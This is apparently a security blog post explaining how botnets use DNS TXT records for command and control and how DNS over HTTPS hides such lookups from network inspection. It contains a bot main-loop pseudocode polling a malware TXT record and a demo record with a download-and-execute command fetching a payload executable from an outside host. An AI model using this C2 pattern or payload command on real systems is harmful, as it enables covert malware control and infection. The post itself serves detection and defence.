Stealthy Botnets using DNS TXT Records & DNS over HTTPS (DoH) adoption Implications
Introduction
Stealthy botnets use DNS TXT records as a Command and Control (CNC) mechanism. Consider the millions of DNS requests your organization generates in a single day, or even an hour. That's why Botnets using TXT records for CNC can remain undetected for extended periods of time -- the effort required to inspect and process DNS traffic.
DNS over HTTPS (DoH) is a new way to perform DNS lookups that has already been adopted by Firefox and expected to be used by other browsers in the near future. In theory, DoH will increase privacy so Internet Service Providers (ISPs) (or similar entities) can't snoop on your browsing history by examining DNS traffic.
What impact will DNS over HTTPS have on Botnets hiding CNC communications in DNS TXT records? Let's find out.
*spoiler alert, it's not good*
In the Wild
- https://www.zdnet.com/article/first-ever-malware-strain-spotted-abusing-new-doh-dns-over-https-protocol/
- https://www.bleepingcomputer.com/news/security/new-spam-campaign-controlled-by-attackers-via-dns-txt-records/
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/necurs-spam-uses-dns-txt-records-for-redirection/
Pseudocode
A main loop for a bot using DNS TXT as a CNC mechanism could be as follows:
while (1) {
DNSRet = GetDnsTxtData("txt.malware.com");
if (DNSRet) {
lstrcpy(Data, EnDecrypt(DNSRet));
ParseCommands(Data);
}
Sleep(%m); }
In this case, the ParseCommands function can spawn threads for processing commands.
The Real Deal
Based on the pseudocode a small project was created in Visual Studio demonstrating the use of DNS TXT as a CNC.
Demo
For the demo, we configure a text record with the download and execute command.
Plaintext
1 http://d.cyberarmor.pro/.d/payload1.exe|
TXT Record Content
Over the Wire
A pcap is available of the traffic captured with WireShark during the demo. Examination of the pcap reveals we can identify the DNS record name used for a CNC and view the content of the record when it was transmitted over the wire.
Discussion
Threat actors have used this method in the past and will continue to do so in the future. The good news was botnet operators aren’t going to leave critical parts of their infrastructure exposed in a public DNS TXT record. Encoded, obfuscated or encrypted records will standout when compared to benign records because they have a higher byte entropy. Searching for high entropy content in DNS TXT record responses could be used to detect or at the very least flag TXT records with suspicious content.
Problem
Due to the expected adoption of DoH, it will be easier for botnets hiding their CNC communications in DNS TXT to blend in with requests generated by the user’s browser. Inspection will no longer be an option. Why? A bot can use the same DoH server as the user's browser or a list containing the most popular DoH resolvers to hide the lookup request traffic and the response will not be visible over the wire.
DoH Request
Using a standalone DoH client we request the same TXT record the bot uses as a CNC.
A quick glance at the pcap shows the traditional https handshake followed by application data. This is the expected behavior for a DNS request resolved by DoH.
After examining the pcap, we are unable to locate the requested CNC record name or the content of the response transmitted over the wire because it was encrypted by DoH. Uh-oh!
Github (for DoH Client): https://github.com/curl/doh
Solution
Let’s brainstorm. Grab a spot on my calendar and bring your whiteboard :)